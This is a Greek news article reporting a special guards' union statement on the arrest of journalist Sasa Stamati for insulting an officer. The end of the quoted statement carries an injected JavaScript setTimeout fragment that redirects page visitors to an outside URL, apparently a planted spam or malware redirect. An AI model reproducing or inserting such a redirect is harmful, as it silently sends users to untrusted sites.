Ειδικοί Φρουροί για σύλληψη Σάσας Σταμάτη: Ο νόμος είναι ίσος έναντι όλων

0
11

 

Με αφορμή το περιστατικό σύλληψης της δημοσιογράφου Σάσας Σταμάτη το Σωματείο Ειδικών Φρουρών Αττικής εξέδωσε ανακοίνωση, στην οποία επισημαίνεται ότι «ο νόμος είναι ίσος έναντι όλων».

Οι συνδικαλιστές αστυνομικοί στην ανακοίνωση τους κάνουν λόγο για «παντοειδείς πιέσεις» που δέχθηκε ο ειδικός φρουρός που έκανε μήνυση στην κα Σταμάτη, προφανώς για να αποσύρει τη μήνυση.

Όπως αναφέρουν χαρακτηριστικά στην ανακοίνωση τους:

Με αφορμή το περιστατικό της σύλληψης δημοσιογράφου για εξύβριση, από Ειδικό Φρουρό της Αστυνομικής Διεύθυνσης Πειραιά, μετά και την έκταση που έλαβε στα Μ.Μ.Ε, το Σ.Ε.Φ.Ε.Α.Α για πολλοστή φορά επαναλαμβάνει την θέση του.

Ο Νόμος έναντι των πολιτών, μεταξύ αυτών και των αστυνομικών, δεν διαφοροποιείται έναντι «επωνύμων δημοσιογράφων » και απλών κοινών θνητών . Η ενδεχόμενη έπαρση εκείνων που αισθάνονται υπεράνω του Νόμου υβρίζοντας απλούς εργαζόμενους, εμποδίζοντας τους στο έργο που τους έχει αναθέσει η πολιτεία, πρέπει να οδηγείται στην κρίση των δικαστικών αρχών.

Το Σ.Ε.Φ.Ε.Α.Α στηρίζει τον συνάδελφο που μπήκε στη «δίνη’ παντοειδών πιέσεων και τελικά έπραξε το καθήκον του, όπως στηρίζει ΕΜΠΡΑΚΤΑ και ενθαρρύνει όλους τους Συναδέλφους να πράττουν τα νόμιμα αδιαφορώντας σε παρεμβάσεις, αναγνωρίζοντας σε όλους τους πολίτες ονοματεπώνυμο, αδιαφορώντας στον «επώνυμο». setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here